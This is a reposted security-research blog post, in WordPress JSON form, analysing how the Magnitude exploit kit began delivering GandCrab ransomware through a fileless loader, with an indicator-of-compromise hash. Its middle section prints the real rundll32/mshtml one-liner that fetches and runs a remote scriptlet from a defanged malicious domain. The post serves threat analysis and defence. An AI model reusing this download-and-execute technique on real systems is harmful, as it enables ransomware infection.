{"id":12043,"date":"2018-04-17T10:10:08","date_gmt":"2018-04-17T18:10:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/04\/17\/news-5812\/"},"modified":"2018-04-17T10:10:08","modified_gmt":"2018-04-17T18:10:08","slug":"news-5812","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/04\/17\/news-5812\/","title":{"rendered":"Magnitude exploit kit switches to GandCrab ransomware"},"content":{"rendered":"

Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 17 Apr 2018 16:58:26 +0000<\/strong><\/p>\n

The GandCrab ransomware is reaching far and wide via malspam<\/a>, social engineering schemes<\/a>, and exploit kit campaigns<\/a>. On April 16, we discovered that Magnitude EK, which\u00a0had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.<\/p>\n

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber<\/a>, which was extremely thorough at avoiding other geolocations.<\/p>\n

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect.\u00a0The variations of this technique have been known for several years<\/a>\u00a0and used by other families such as by Poweliks, but they are a new addition to Magnitude.<\/p>\n

\"\"<\/a><\/p>\n

Figure 1: Magnitude EK traffic capture with the GandCrab payload<\/em><\/p>\n

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding<\/a>, or more recently via another technique<\/a>, but still exposing it “in the clear” from traffic or network packet capture.<\/p>\n

\"\"<\/a><\/p>\n

Figure 2: Magnitude EK dropping Magniber\u00a0on April 4, 2018<\/em><\/p>\n

The payload is encoded (using VBScript.Encode\/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.<\/p>\n

\"C:WindowsSystem32rundll32.exe\" javascript:\"..mshtml,RunHTMLApplication \";  document.write();GetObject('script:http:\/\/dx30z30a4t11l7be.lieslow[.]faith\/5aad4b91a0da20d4faab0991bdbe7138')<\/span><\/pre>\n
\"\"<\/a><\/p>\n
Figure 3: Innocuous scriptlet hides the payload<\/em><\/p>\n
After the payload is injected into explorer.exe<\/em>, it\u00a0immediately attempts to reboot the machine. If we suspend that process and use @hasherezade<\/a>‘s PE-Sieve<\/a>, we can actually dump the GandCrab DLL from memory:<\/p>\n
\"\"<\/a><\/p>\n
Figure 4: Extracting the payload from memory using PE-Sieve<\/em><\/p>\n
Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.<\/p>\n
\"\"<\/a><\/p>\n
Figure 5: GandCrab’s ransom note<\/em><\/p>\n
A recent law enforcement operation<\/a> provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.<\/p>\n
Malwarebytes<\/a> users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.<\/p>\n
Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.<\/p>\n
Indicators of compromise<\/h3>\n
Dumped GandCrab DLL<\/p>\n
9daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a<\/pre>\n
The post Magnitude exploit kit switches to GandCrab ransomware<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n
https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 17 Apr 2018 16:58:26 +0000<\/strong><\/p>\n\n\n\n
<\/a><\/td>\n<\/tr>\n
After being faithful to its own Magniber ransomware for several months, Magnitude EK joins others to adopt GandCrab.<\/p>\n
Categories: <\/p>\n